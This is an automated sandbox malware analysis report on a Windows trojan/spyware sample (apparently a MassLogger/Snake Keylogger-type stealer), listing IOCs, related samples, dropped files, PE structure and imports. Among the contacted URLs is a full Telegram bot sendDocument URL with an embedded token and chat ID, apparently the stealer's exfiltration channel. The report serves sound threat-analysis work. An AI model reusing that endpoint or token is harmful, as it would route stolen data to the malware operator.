http://checkip.dyndns.com	RegSvcs.exe, 00000002.00000002.3303484774.000000000314C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	RegSvcs.exe, 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	RegSvcs.exe, 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://api.telegram.org	RegSvcs.exe, 00000002.00000002.3303484774.000000000326A000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000002.00000002.3303484774.00000000030C9000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot-/sendDocument?chat_id=	RegSvcs.exe, 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	RegSvcs.exe, 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437	RegSvcs.exe, 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	RegSvcs.exe, 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303484774.000000000314C000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
158.101.44.242	checkip.dyndns.com	United States		31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589102
Start date and time:	2025-01-11 09:36:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	nfKqna8HuC.exe renamed because original name is a hash value
Original Sample Name:	d410880574c2296f6f028d4112101a3ed0184b016f4d52cbcc743fc81f21da2d.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/2@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 57 Number of non-executed functions: 293
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45, 20.109.210.53
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	Exodus.txt.lnk	Get hash	malicious	StormKitty	Browse
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
158.101.44.242	aS39AS7b0P.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	3qr7JBuNuX.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	prlsqnzspl.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	yqfze5TKW7.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	WGi85dsMNp.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	aS39AS7b0P.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	gGI2gVBI0f.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	ZpYFG94D4C.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	b6AGgIJ87g.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
api.telegram.org	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Exodus.txt.lnk	Get hash	malicious	StormKitty	Browse	149.154.167.220
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Exodus.txt.lnk	Get hash	malicious	StormKitty	Browse	149.154.167.220
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
ORACLE-BMC-31898US	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	aS39AS7b0P.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	gGI2gVBI0f.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	ZpYFG94D4C.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	b6AGgIJ87g.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	kAsh3nmsgs.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Exodus.txt.lnk	Get hash	malicious	StormKitty	Browse	149.154.167.220
	dhPWt112uC.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	lrw6UNGsUC.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\nfKqna8HuC.exe
File Type:	data
Category:	dropped
Size (bytes):	207562
Entropy (8bit):	7.973710526680461
Encrypted:	false
SSDEEP:	6144:6sFCWUm8eGklpm6MeBz5V8OrlPkeEpHdRBkwlF:6ICWUmBDmIBz5FkegPrF
MD5:	BD383EBE896225FBB522F40BB8BFE65D
SHA1:	DF55FA80C5177CA52B45BFF85B91A0985E76BF78
SHA-256:	55F6C30E910416D7986C6C791415075B5929167181978135D15640F07DC5BE82
SHA-512:	E29B123C82E42D2DB58C012410CEF008B4D3319E27F1032A49B179A366EE99714F272E206117E2E9DED6B15B10A2E4F4B69D231C09C07745F4A3321BCD3CD530
Malicious:	false
Reputation:	low
Preview:	EA06..4..@4.Y...K...f..R.....B.6...SI...d....:.^.7...\.g.P...M..(...v..._..[.F_#..f....o:.U&r..fIz.L.r..n3/.Z.5.9...5.UN$....}..5....y).Q...\V_$..2I..Q8..s...(........Q...D^.G.Ht2...CM......u^.J.......h.z.+.=.4..(U........ms..j...[8.T:u.....) .F....]g4j..YW.L.`.Y..}k.S..huZ.".U.MjT~..J.U.`.-Z.K..>..Y...wF..K3..[.@.....+..}..j`....e.....,....S..f.../..B.R...%{.J....'>.7.P..~......L.t9........:..kW..9.`...W..U...b..em@.%................3.K1t...s&.R.5:.jgv.......@.c......{.{..17.U.zl...(.Oj[M...!.V...+. ...4../3...y..{...g4.:..74.~g..v.qU.O..z......u._.o...~vP..>..x'`.......\|.Mc....../.>.D..mF....{...g......M23J..y...w.#.U.......M6...b.Q.j..:.G5..s3\...W....+.....n"...K...I.P..R.....+9.....h......m.@..C.V-...K.......#......f=...+;....O..-.e......M....&.Y...H..0..(.....{\|.k...F/.......h)U..X.,...8.g.w.4.\.......R..T.6)t......_+.v.P.Th.Z..qV...S../.jn..{u.[....0.X.Uz=nmP....*..y}.Q(....K..a...........C1.p.".t.Au.:..G.....j..QO.v

C:\Users\user\AppData\Local\Temp\thixophobia

Download File

Process:	C:\Users\user\Desktop\nfKqna8HuC.exe
File Type:	data
Category:	dropped
Size (bytes):	209920
Entropy (8bit):	7.842905658025974
Encrypted:	false
SSDEEP:	6144:4iNvduNaBUJYFS4ZczawJgP6pz/g3ThHe1Ym6:4iNvds+UqFS4ezd+Ps/MTh+1Yt
MD5:	83B6BF659E7AE167174B0A76791628FE
SHA1:	13B1F977EB982F35C4007F0781E4586D147E9CC1
SHA-256:	CC902054E9AF0F2F026650C7B617A92C73058E34194B3E9ECF270BC9344D1004
SHA-512:	1D06BA7FDFB8D4A7038715989650243EA5A71C91CDFDA8D11BDCB7443EDF394406A5D4FAB31F93C56D0B33D045DCF454BA6184198E1DC85A471467F76C871B59
Malicious:	false
Reputation:	low
Preview:	~..5:FPKUGUZ.WR.RGY6PZ6.3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQG.Z3VYM.\G.?.{.V...aQ/#k!5:=A7:rT3)7Y$zT2.(A[./>k...z^937._JS.PZ6W3Z4]).}g .+vB.)~F.9k./$.&.$?..8{:.9y+.(.#.,uzX.FG.Mh.\G.!./uv!M{&.I..:^\|+.)3Z459FPKQGUZ3VWR.h2.6PZ6.vZ4y8BP?.G.Z3VWR7RG.6s[=V:Z4.8FP.PGUZ3Vx.7RGI6PZ.V3Z4u9F@KQGWZ3SWR7RGY6UZ6W3Z459.SKQCUZ.mUR5RG.6PJ6W#Z459VPKAGUZ3VWB7RGY6PZ6W3Z. ;F.KQGU:1V.@6RGY6PZ6W3Z459FPKQGUZ3VWR7..X6LZ6W3Z459FPKQGUZ3VWR7RGY6PZ6.>X4u9FPKQGUZ3VWR.SG.7PZ6W3Z459FPKQGUZ3VWR7RGY6PtB2K.459^.JQGEZ3V.S7RCY6PZ6W3Z459FPKqGU:.$33C3GY.=Z6W.[45WFPK.FUZ3VWR7RGY6PZvW3..QX21KQG.j3VWr5RGO6PZ<U3Z459FPKQGUZ3.WR.\|5*D3Z6W.H559&RKQSTZ3vUR7RGY6PZ6W3Z4u9F.KQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.069221429639379
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	nfKqna8HuC.exe
File size:	1'147'392 bytes
MD5:	377f17e222f90e7dbb2d75c7ba9175f3
SHA1:	3aafb77c8fca8727985a1c1f3e06b54ef5f10f70
SHA256:	d410880574c2296f6f028d4112101a3ed0184b016f4d52cbcc743fc81f21da2d
SHA512:	5575e1852328a7744b6666788166b9728e8a44f1a5276b9246b3377b791ac0c17be51b96b39fc3ca1f77dbb96907e51d1791341343b5fb16e9771489b3e4c928
SSDEEP:	24576:ytb20pkaCqT5TBWgNQ7abmHCaphF0iqjw6A:/Vg5tQ7abmr2M5
TLSH:	FD35CF1273DE8364C3B25273BA65B741BEBF782506A1F56B2FD8093DE920122521E773
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6747B205 [Wed Nov 27 23:57:57 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007F41D0EF2BFFh
jmp 00007F41D0EE5C14h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F41D0EE5D9Ah
cmp edi, eax
jc 00007F41D0EE60FEh
bt dword ptr [004C0158h], 01h
jnc 00007F41D0EE5D99h
rep movsb
jmp 00007F41D0EE60ACh
cmp ecx, 00000080h
jc 00007F41D0EE5F64h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F41D0EE5DA0h
bt dword ptr [004BA370h], 01h
jc 00007F41D0EE6270h
bt dword ptr [004C0158h], 00000000h
jnc 00007F41D0EE5F3Dh
test edi, 00000003h
jne 00007F41D0EE5F4Eh
test esi, 00000003h
jne 00007F41D0EE5F2Dh
bt edi, 02h
jnc 00007F41D0EE5D9Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F41D0EE5DA3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F41D0EE5DF5h
bt esi, 03h
jnc 00007F41D0EE5E48h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x4f1e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x114000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x4f1e8	0x4f200	7df0d45e5c730c35280426d3973d24f4	False	0.9176571139415481	data	7.869966047025345	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x114000	0xa474	0xa600	0bc98f8631ef0bde830a7f83bb06ff08	False	0.5017884036144579	data	5.245426654116355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xca038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xca4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xca4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcaa84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc7b8	0x464ef	data			1.0003333530104208
RT_GROUP_ICON	0x112ca8	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x112d20	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x112d34	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x112d48	0x14	data	English	Great Britain	1.25
RT_VERSION	0x112d5c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x112e38	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
